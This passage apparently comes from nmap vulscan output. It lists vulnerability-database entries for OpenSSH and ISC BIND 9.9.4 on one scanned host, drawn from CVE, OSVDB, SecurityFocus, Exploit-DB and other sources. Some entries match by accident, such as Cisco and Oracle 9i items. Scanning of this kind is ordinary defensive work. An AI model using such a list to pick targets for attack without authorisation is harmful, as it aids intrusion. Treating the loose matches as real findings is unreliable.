10623| [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
10624| [881183] CentOS Update for openssh CESA-2012:0884 centos6
10625| [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
10626| [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
10627| [870763] RedHat Update for openssh RHSA-2012:0884-04
10628| [870129] RedHat Update for openssh RHSA-2008:0855-01
10629| [861813] Fedora Update for openssh FEDORA-2010-5429
10630| [861319] Fedora Update for openssh FEDORA-2007-395
10631| [861170] Fedora Update for openssh FEDORA-2007-394
10632| [861012] Fedora Update for openssh FEDORA-2007-715
10633| [840345] Ubuntu Update for openssh vulnerability USN-597-1
10634| [840300] Ubuntu Update for openssh update USN-612-5
10635| [840271] Ubuntu Update for openssh vulnerability USN-612-2
10636| [840268] Ubuntu Update for openssh update USN-612-7
10637| [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
10638| [840214] Ubuntu Update for openssh vulnerability USN-566-1
10639| [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
10640| [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
10641| [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
10642| [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
10643| [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
10644| [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
10645| [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
10646| [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
10647| [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
10648| [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
10649| [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
10650| [100584] OpenSSH X Connections Session Hijacking Vulnerability
10651| [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
10652| [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
10653| [65987] SLES10: Security update for OpenSSH
10654| [65819] SLES10: Security update for OpenSSH
10655| [65514] SLES9: Security update for OpenSSH
10656| [65513] SLES9: Security update for OpenSSH
10657| [65334] SLES9: Security update for OpenSSH
10658| [65248] SLES9: Security update for OpenSSH
10659| [65218] SLES9: Security update for OpenSSH
10660| [65169] SLES9: Security update for openssh,openssh-askpass
10661| [65126] SLES9: Security update for OpenSSH
10662| [65019] SLES9: Security update for OpenSSH
10663| [65015] SLES9: Security update for OpenSSH
10664| [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
10665| [61639] Debian Security Advisory DSA 1638-1 (openssh)
10666| [61030] Debian Security Advisory DSA 1576-2 (openssh)
10667| [61029] Debian Security Advisory DSA 1576-1 (openssh)
10668| [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
10669| [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
10670| [60667] Slackware Advisory SSA:2008-095-01 openssh
10671| [59014] Slackware Advisory SSA:2007-255-01 openssh
10672| [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
10673| [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
10674| [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
10675| [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
10676| [57492] Slackware Advisory SSA:2006-272-02 openssh
10677| [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
10678| [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
10679| [57470] FreeBSD Ports: openssh
10680| [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
10681| [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
10682| [56294] Slackware Advisory SSA:2006-045-06 openssh
10683| [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
10684| [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
10685| [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
10686| [53788] Debian Security Advisory DSA 025-1 (openssh)
10687| [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
10688| [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
10689| [11343] OpenSSH Client Unauthorized Remote Forwarding
10690| [10954] OpenSSH AFS/Kerberos ticket/token passing
10691| [10883] OpenSSH Channel Code Off by 1
10692| [10823] OpenSSH UseLogin Environment Variables
10693|
10694| SecurityTracker - https://www.securitytracker.com:
10695| [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
10696| [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
10697| [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
10698| [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
10699| [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
10700| [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
10701| [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
10702| [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
10703| [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
10704| [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
10705| [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
10706| [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
10707| [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
10708| [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
10709| [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
10710| [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
10711| [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
10712| [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
10713| [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
10714| [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
10715| [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
10716| [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
10717| [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
10718| [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
10719| [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
10720| [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
10721| [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
10722| [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
10723| [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
10724| [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
10725| [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
10726| [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
10727| [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
10728| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
10729| [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
10730| [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
10731| [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
10732| [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
10733|
10734| OSVDB - http://www.osvdb.org:
10735| [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
10736| [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
10737| [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
10738| [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
10739| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
10740| [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
10741| [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
10742| [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
10743| [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
10744| [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
10745| [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
10746| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
10747| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
10748| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
10749| [56921] OpenSSH Unspecified Remote Compromise
10750| [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
10751| [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
10752| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
10753| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
10754| [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
10755| [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
10756| [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
10757| [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
10758| [43745] OpenSSH X11 Forwarding Local Session Hijacking
10759| [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
10760| [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
10761| [37315] pam_usb OpenSSH Authentication Unspecified Issue
10762| [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
10763| [34601] OPIE w/ OpenSSH Account Enumeration
10764| [34600] OpenSSH S/KEY Authentication Account Enumeration
10765| [32721] OpenSSH Username Password Complexity Account Enumeration
10766| [30232] OpenSSH Privilege Separation Monitor Weakness
10767| [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
10768| [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
10769| [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
10770| [29152] OpenSSH Identical Block Packet DoS
10771| [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
10772| [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
10773| [22692] OpenSSH scp Command Line Filename Processing Command Injection
10774| [20216] OpenSSH with KerberosV Remote Authentication Bypass
10775| [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
10776| [19141] OpenSSH GSSAPIAuthentication Credential Escalation
10777| [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
10778| [16567] OpenSSH Privilege Separation LoginGraceTime DoS
10779| [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
10780| [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
10781| [9550] OpenSSH scp Traversal Arbitrary File Overwrite
10782| [6601] OpenSSH *realloc() Unspecified Memory Errors
10783| [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
10784| [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
10785| [6072] OpenSSH PAM Conversation Function Stack Modification
10786| [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
10787| [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
10788| [5408] OpenSSH echo simulation Information Disclosure
10789| [5113] OpenSSH NIS YP Netgroups Authentication Bypass
10790| [4536] OpenSSH Portable AIX linker Privilege Escalation
10791| [3938] OpenSSL and OpenSSH /dev/random Check Failure
10792| [3456] OpenSSH buffer_append_space() Heap Corruption
10793| [2557] OpenSSH Multiple Buffer Management Multiple Overflows
10794| [2140] OpenSSH w/ PAM Username Validity Timing Attack
10795| [2112] OpenSSH Reverse DNS Lookup Bypass
10796| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
10797| [1853] OpenSSH Symbolic Link 'cookies' File Removal
10798| [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
10799| [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
10800| [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
10801| [688] OpenSSH UseLogin Environment Variable Local Command Execution
10802| [642] OpenSSH Multiple Key Type ACL Bypass
10803| [504] OpenSSH SSHv2 Public Key Authentication Bypass
10804| [341] OpenSSH UseLogin Local Privilege Escalation
10805|_
1080653/tcp open domain syn-ack ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
10807| vulscan: VulDB - https://vuldb.com:
10808| [11804] ISC BIND up to 9.9.4 DNS Query bin/named/query.c query_findclosestnsec3() denial of service
10809| [11104] ISC BIND up to 9.9.4 WSAloctl Winsock API Bypass privilege escalation
10810| [9764] ISC BIND up to 9.9.4 RDATA rdata.c denial of service
10811| [119548] ISC BIND 9.9.12/9.10.7/9.11.3/9.12.1-P2 Recursion information disclosure
10812| [95202] ISC BIND up to 9.9.9-P4/9.10.4-P4/9.11.0-P1 DNSSEC denial of service
10813| [95201] ISC BIND up to 9.9.9-P4/9.10.4-P4/9.11.0-P1 DS Record Response denial of service
10814| [95200] ISC BIND up to 9.9.9-P4/9.10.4-P4/9.11.0-P1 ANY Query Response denial of service
10815| [89850] ISC BIND up to 9.9.9-P1/9.10.4-P1/9.11.0b1 Lightweight Resolution named.conf denial of service
10816| [81312] ISC BIND up to 9.9.8-P3/9.10.3-P3 named db.c/resolver.c Signature Record denial of service
10817| [81311] ISC BIND up to 9.9.8-P3/9.10.3-P3 named alist.c/sexpr.c denial of service
10818| [80787] ISC BIND up to 9.9.8-S4 Query rdataset.c denial of service
10819| [79802] ISC BIND 9.9.0/9.10.0/9.10.1-P1 Socket Error resolver.c denial of service
10820| [79801] ISC BIND 9.9.0/9.10.0/9.10.1-P1 Response db.c denial of service
10821| [76834] ISC BIND up to 9.9.7-P1/9.10.2-P2 TKEY Query Packet Crash denial of service
10822| [8108] ISC BIND up to 9.9.3 on Unix/Linux Regular Expression denial of service
10823| [7079] ISC BIND up to 9.9.1 DNS64 IPv6 Transition Mechanism denial of service
10824| [6295] ISC BIND up to 9.9.1-P2 Assertion Error Resource Record Parser RDATA Query denial of service
10825| [5875] ISC BIND 9.9.0/9.9.1 denial of service
10826| [5874] ISC BIND up to 9.9.1-P1 denial of service
10827| [5483] ISC BIND up to 9.9.1 DNS Resource Record information disclosure
10828|
10829| MITRE CVE - https://cve.mitre.org:
10830| [CVE-2013-4854] The RFC 5011 implementation in rdata.c in ISC BIND 9.7.x and 9.8.x before 9.8.5-P2, 9.8.6b1, 9.9.x before 9.9.3-P2, and 9.9.4b1, and DNSco BIND 9.9.3-S1 before 9.9.3-S1-P1 and 9.9.4-S1b1, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query with a malformed RDATA section that is not properly handled during construction of a log message, as exploited in the wild in July 2013.
10831| [CVE-2013-3919] resolver.c in ISC BIND 9.8.5 before 9.8.5-P1, 9.9.3 before 9.9.3-P1, and 9.6-ESV-R9 before 9.6-ESV-R9-P1, when a recursive resolver is configured, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for a record in a malformed zone.
10832| [CVE-2013-2266] libdns in ISC BIND 9.7.x and 9.8.x before 9.8.4-P2, 9.8.5 before 9.8.5b2, 9.9.x before 9.9.2-P2, and 9.9.3 before 9.9.3b2 on UNIX platforms allows remote attackers to cause a denial of service (memory consumption) via a crafted regular expression, as demonstrated by a memory-exhaustion attack against a machine running a named process.
10833| [CVE-2012-5689] ISC BIND 9.8.x through 9.8.4-P1 and 9.9.x through 9.9.2-P1, in certain configurations involving DNS64 with a Response Policy Zone that lacks an AAAA rewrite rule, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for an AAAA record.
10834| [CVE-2012-5688] ISC BIND 9.8.x before 9.8.4-P1 and 9.9.x before 9.9.2-P1, when DNS64 is enabled, allows remote attackers to cause a denial of service (assertion failure and daemon exit) via a crafted query.
10835| [CVE-2012-5166] ISC BIND 9.x before 9.7.6-P4, 9.8.x before 9.8.3-P4, 9.9.x before 9.9.1-P4, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P4 allows remote attackers to cause a denial of service (named daemon hang) via unspecified combinations of resource records.
10836| [CVE-2012-4244] ISC BIND 9.x before 9.7.6-P3, 9.8.x before 9.8.3-P3, 9.9.x before 9.9.1-P3, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P3 allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for a long resource record.
10837| [CVE-2012-3868] Race condition in the ns_client structure management in ISC BIND 9.9.x before 9.9.1-P2 allows remote attackers to cause a denial of service (memory consumption or process exit) via a large volume of TCP queries.
10838| [CVE-2012-1667] ISC BIND 9.x before 9.7.6-P1, 9.8.x before 9.8.3-P1, 9.9.x before 9.9.1-P1, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P1 does not properly handle resource records with a zero-length RDATA section, which allows remote DNS servers to cause a denial of service (daemon crash or data corruption) or obtain sensitive information from process memory via a crafted record.
10839| [CVE-2011-4313] query.c in ISC BIND 9.0.x through 9.6.x, 9.4-ESV through 9.4-ESV-R5, 9.6-ESV through 9.6-ESV-R5, 9.7.0 through 9.7.4, 9.8.0 through 9.8.1, and 9.9.0a1 through 9.9.0b1 allows remote attackers to cause a denial of service (assertion failure and named exit) via unknown vectors related to recursive DNS queries, error logging, and the caching of an invalid record by the resolver.
10840| [CVE-2011-2465] Unspecified vulnerability in ISC BIND 9 9.8.0, 9.8.0-P1, 9.8.0-P2, and 9.8.1b1, when recursion is enabled and the Response Policy Zone (RPZ) contains DNAME or certain CNAME records, allows remote attackers to cause a denial of service (named daemon crash) via an unspecified query.
10841| [CVE-2011-2464] Unspecified vulnerability in ISC BIND 9 9.6.x before 9.6-ESV-R4-P3, 9.7.x before 9.7.3-P3, and 9.8.x before 9.8.0-P4 allows remote attackers to cause a denial of service (named daemon crash) via a crafted UPDATE request.
10842|
10843| SecurityFocus - https://www.securityfocus.com/bid/:
10844| [61774] ISC BIND 9 SRTT Algorithm Authoritative Server Selection Security Vulnerability
10845| [61479] ISC BIND 9 DNS RDATA Handling CVE-2013-4854 Remote Denial of Service Vulnerability
10846| [58736] ISC BIND 9 'libdns' Remote Denial of Service Vulnerability
10847| [57556] ISC BIND 9 DNS64 CVE-2012-5689 Remote Denial of Service Vulnerability
10848| [56817] ISC BIND 9 DNS64 Remote Denial of Service Vulnerability
10849| [55852] ISC BIND 9 DNS RDATA Handling CVE-2012-5166 Remote Denial of Service Vulnerability
10850| [55522] ISC BIND 9 DNS Resource Records Handling CVE-2012-4244 Remote Denial of Service Vulnerability
10851| [54659] ISC BIND 9 TCP Query Remote Denial of Service Vulnerability
10852| [54658] ISC BIND 9 DNSSEC Validation CVE-2012-3817 Denial of Service Vulnerability
10853| [53772] ISC BIND 9 DNS Resource Records Handling Remote Denial of Service Vulnerability
10854| [50690] ISC BIND 9 Recursive Queries Remote Denial of Service Vulnerability
10855| [48566] ISC BIND 9 Unspecified Packet Processing Remote Denial of Service Vulnerability
10856| [48565] ISC BIND 9 RPZ Configurations Remote Denial of Service Vulnerabilities
10857| [48007] ISC BIND 9 Large RRSIG RRsets Remote Denial of Service Vulnerability
10858| [47734] ISC BIND 9 RRSIG Query Type Remote Denial of Service Vulnerability
10859| [46491] ISC BIND 9 IXFR Transfer/DDNS Update Remote Denial of Service Vulnerability
10860| [45385] ISC BIND 9 DNSSEC Validation Remote Denial of Service Vulnerability
10861| [45133] ISC BIND 9 'RRSIG' Record Type Negative Cache Remote Denial of Service Vulnerability
10862| [41730] ISC BIND 9 'RRSIG' Record Type Remote Denial of Service Vulnerability
10863| [37865] ISC BIND 9 DNSSEC Bogus NXDOMAIN Response Remote Cache Poisoning Vulnerability
10864| [37118] ISC BIND 9 DNSSEC Query Response Additional Section Remote Cache Poisoning Vulnerability
10865| [35848] ISC BIND 9 Remote Dynamic Update Message Denial of Service Vulnerability
10866| [25076] ISC BIND 9 Default ACL Settings Recursive Queries And Cached Content Security Bypass Vulnerability
10867| [25037] ISC BIND 9 Remote Cache Poisoning Vulnerability
10868| [4936] ISC BIND 9 Remote Denial Of Service Vulnerability
10869| [100656] Cisco ASR 920 Series Routers CVE-2017-6795 Local Arbitrary File Overwrite Vulnerability
10870| [97450] Cisco ASR 903 and ASR 920 Series CVE-2017-6603 Denial of Service Vulnerability
10871| [93415] Cisco Nexus 9000 Series Switches CVE-2016-1455 Remote Information Disclosure Vulnerability
10872| [82579] Cisco Nexus 9000 Series ACI Mode Switches CVE-2015-6398 Denial of Service Vulnerability
10873| [77686] Cisco Firepower 9000 Series CVE-2015-6380 Unspecified OS Command Injection Vulnerability
10874| [77635] Cisco Firepower 9000 Series CVE-2015-6371 Multiple Arbitrary File Read Vulnerabilities
10875| [77634] Cisco Firepower 9000 Series CVE-2015-6370 Local Command Injection Vulnerability
10876| [77633] Cisco Firepower 9000 Series Switches CVE-2015-6372 HTML Injection Vulnerability
10877| [77631] Cisco Firepower 9000 Series Switches CVE-2015-6374 Clickjacking Vulnerability
10878| [77629] Cisco Firepower 9000 Series CVE-2015-6369 Local Denial of Service Vulnerability
10879| [77628] Cisco Firepower 9000 CVE-2015-6373 Cross Site Request Forgery Vulnerability
10880| [77614] Cisco Firepower 9000 Series Switches CVE-2015-6368 Information Disclosure Vulnerability
10881| [76913] Cisco NX-OS Software for Nexus 9000 Series Switches CVE-2015-6308 Denial of Service Vulnerability
10882| [76791] Cisco ASR 9000 Series Aggregation Services Routers CVE-2015-6301 Denial of Service Vulnerability
10883| [76762] Cisco NX-OS Software for Nexus 9000 Series CVE-2015-6295 Denial of Service Vulnerability
10884| [76329] Cisco Nexus 9000 Series Software CVE-2015-4301 Remote Denial of Service Vulnerability
10885| [76057] Cisco Firepower 9000 Series Devices CVE-2015-4287 Information Disclosure Vulnerability
10886| [75471] Cisco Unified IP Phones 9900 Series CVE-2015-4226 Denial of Service Vulnerability
10887| [75378] Cisco NX-OS Software for Nexus 9000 Series CVE-2015-4213 Information Disclosure Vulnerability
10888| [74029] Cisco ASR 9000 Series Routers CVE-2015-0694 Remote Security Bypass Vulnerability
10889| [73895] Cisco NX-OS Software for Nexus 9000 Series CVE-2015-0686 Denial of Service Vulnerability
10890| [73470] Cisco ASR 9000 Series Routers CVE-2015-0685 Denial of Service Vulnerability
10891| [73318] Cisco ASR 9000 Series Aggregation Services Routers CVE-2015-0672 Denial of Service Vulnerability
10892| [72485] Cisco Unified IP Phones 9900 Series CVE-2015-0604 Arbitrary File Upload Vulnerability
10893| [72484] Cisco Unified IP Phones 9900 Series CVE-2015-0603 Local Denial of Service Vulnerability
10894| [72483] Cisco Unified IP Phones 9900 Series CVE-2015-0601 Local Denial of Service Vulnerability
10895| [72482] Cisco Unified IP Phones 9900 Series CVE-2015-0602 Information Disclosure Vulnerability
10896| [72481] Cisco Unified IP Phones 9900 Series CVE-2015-0600 Denial of Service Vulnerability
10897| [71979] Cisco MDS 9000 NX-OS Software CVE-2015-0582 Denial of Service Vulnerability
10898| [70744] Cisco ASR 901 Series Routers CVE-2014-3293 Denial of Service Vulnerability
10899| [70658] ZTE ZXDSL 931VII 'manager_dev_config_t.gch' Information Disclosure Vulnerability
10900| [69057] Cisco Nexus 9000 Series Switches CVE-2014-3330 Access List Security Bypass Vulnerability
10901| [64770] Cisco Unified IP Phones 9900 Series Crafted Header Unregister Denial of Service Vulnerability
10902| [63564] Cisco MDS 9000 NX-OS Software VRRP Frames Denial of Service Vulnerability
10903| [62944] Cisco Unified IP Phones 9900 Series CVE-2013-5532 Buffer Overflow Vulnerability
10904| [62943] Cisco Unified IP Phones 9900 Series CVE-2013-5533 Local Command Injection Vulnerability
10905| [62905] Cisco Unified IP Phones 9900 Series CVE-2013-5526 Denial of Service Vulnerability
10906| [61330] Cisco Unified IP Phones 9900 Series CVE-2013-3426 Arbitrary File Download Vulnerability
10907| [49633] Oracle Application Server 9i 'httpd.conf' Information Disclosure Vulnerability
10908| [48811] Cisco ASR 9000 Series Routers IP Version 4 Denial of Service Vulnerability
10909| [48264] Aastra 9480i CT Multiple Information Disclosure Vulnerabilities
10910| [15542] NetObjects Fusion 9 Information Disclosure Vulnerability
10911| [6556] Oracle 9i Application Server Sample Scripts Information Disclosure Vulnerability
10912| [6459] Oracle 9i Application Server Java Server Page Source Code Disclosure Vulnerability
10913| [5335] Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
10914| [4290] Oracle 9i Default Configuration File Information Disclosure Vulnerability
10915| [4034] Oracle 9IAS OracleJSP Information Disclosure Vulnerability
10916| [3848] Mandrake Bind 9 Package Insecure File Permissions Vulnerability
10917| [2516] Microsoft Plus! 98 Windows ME Password Disclosure Vulnerability
10918|
10919| IBM X-Force - https://exchange.xforce.ibmcloud.com:
10920| [85799] Cisco Unified IP Phones 9900 Series directory traversal
10921| [75412] Cisco Unified IP Phones 9900 series RT privilege escalation
10922| [68733] Cisco 9000 Series Aggregation Service Router IPv4 packet denial of service
10923| [9704] Multiple Lucent router UDP port 9 could disclose sensitive information
10924| [9250] BIND 9 dns_message_findtype() denial of service
10925| [1852] BIND prior to 4.9.7 buffer overflow affects Digital Firewall 97 users
10926| [539] Microsoft Windows 95 and Internet Explorer password disclosure
10927| [86004] ISC BIND RDATA denial of service
10928| [84767] ISC BIND denial of service
10929| [83066] ISC BIND denial of service
10930| [81504] ISC BIND AAAA denial of service
10931| [80510] ISC BIND DNS64 denial of service
10932| [79121] ISC BIND queries denial of service
10933| [78479] ISC BIND RDATA denial of service
10934| [77185] ISC BIND TCP queries denial of service
10935| [77184] ISC BIND bad cache denial of service
10936| [76034] ISC BIND rdata denial of service
10937| [73053] ISC BIND cache update policy security bypass
10938| [71332] ISC BIND recursive queries denial of service
10939| [68375] ISC BIND UPDATE denial of service
10940| [68374] ISC BIND Response Policy Zones denial of service
10941| [67665] ISC BIND RRSIG Rrsets denial of service
10942| [67297] ISC BIND RRSIG denial of service
10943| [65554] ISC BIND IXFR transfer denial of service
10944| [63602] ISC BIND allow-query security bypass
10945| [63596] ISC BIND zone data security bypass
10946| [63595] ISC BIND RRSIG denial of service
10947| [62072] ISC BIND DNSSEC query denial of service
10948| [62071] ISC BIND ACL security bypass
10949| [61871] ISC BIND anchors denial of service
10950| [60421] ISC BIND RRSIG denial of service
10951| [56049] ISC BIND out-of-bailiwick weak security
10952| [55937] ISC Bind unspecified cache poisoning
10953| [55753] ISC BIND DNSSEC NSEC/NSEC3 cache poisoning
10954| [54416] ISC BIND DNSSEC cache poisoning
10955| [52073] ISC BIND dns_db_findrdataset() denial of service
10956| [47409] Multiple Mozilla products XBL loadBindingDocument information disclosure
10957| [45234] ISC BIND UDP denial of service
10958| [39670] ISC BIND inet_network buffer overflow
10959| [37233] libgssapi ISC BIND Novell SUSE Linux Enterprise Server GSS-TSIG request denial of service
10960| [37128] RHSA update for ISC BIND RRset denial of service not installed
10961| [37127] RHSA update for ISC BIND named service denial of service not installed
10962| [36275] ISC BIND DNS query spoofing
10963| [35575] ISC BIND query ID cache poisoning
10964| [35571] ISC BIND ACL security bypass
10965| [31838] ISC BIND RRset denial of service
10966| [31799] ISC BIND named service denial of service
10967| [29876] HP Tru64 ypbind core dump information disclosure
10968| [28745] ISC BIND DNSSEC RRset denial of service
10969| [28744] ISC BIND recursive INSIST denial of service
10970| [22041] BEA WebLogic Server and Express LDAP anonymous bind information disclosure
10971| [18836] BIND hostname disclosure
10972| [10624] ISC BIND DNS stub resolver library (libresolv.a) stack buffer overflows
10973| [10333] ISC BIND SIG null pointer dereference denial of service
10974| [10332] ISC BIND OPT resource record (RR) denial of service
10975| [10304] ISC BIND SIG cached resource records (RR) heap buffer overflow
10976| [7027] Cisco CBOS Web-based configuration utility binds to port 80 by default
10977| [5814] ISC BIND "
10978| [5540] ISC BIND can be remotely crashed by issuing ZXFR requests
10979| [5462] ISC BIND AXFR host command remote buffer overflow
10980|
10981| Exploit-DB - https://www.exploit-db.com:
10982| [24689] cPanel 9.9.1 -R3 Front Page Extension Installation Information Disclosure
10983| [23059] Netbula Anyboard 9.9.5 6 Information Disclosure Vulnerability
10984| [9300] ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC
10985|
10986| OpenVAS (Nessus) - http://www.openvas.org:
10987| [103090] ISC BIND 9 IXFR Transfer/DDNS Update Remote Denial of Service Vulnerability
10988| [103031] ISC BIND 9 < 9.7.2-P2 Multiple Vulnerabilities
10989| [103030] ISC BIND 9 'RRSIG' Record Type Negative Cache Remote Denial of Service Vulnerability
10990| [100717] ISC BIND 9 'RRSIG' Record Type Remote Denial of Service Vulnerability
10991| [100458] ISC BIND 9 DNSSEC Bogus NXDOMAIN Response Remote Cache Poisoning Vulnerability
